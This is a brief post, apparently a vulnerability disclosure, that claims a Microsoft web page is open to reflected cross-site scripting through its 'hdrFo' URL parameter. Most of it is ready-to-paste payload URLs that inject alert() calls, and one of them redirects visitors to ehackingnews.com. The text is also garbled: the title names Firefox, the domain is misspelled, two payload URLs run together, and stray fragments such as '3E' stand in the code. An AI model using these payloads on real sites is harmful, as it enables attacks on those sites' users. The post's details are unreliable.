Mozilla Firefox - XSS
Microsoft official website(micrsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page url.

hxxp://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->3Ealert('Simple XSS')

Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")

by
flexxpoint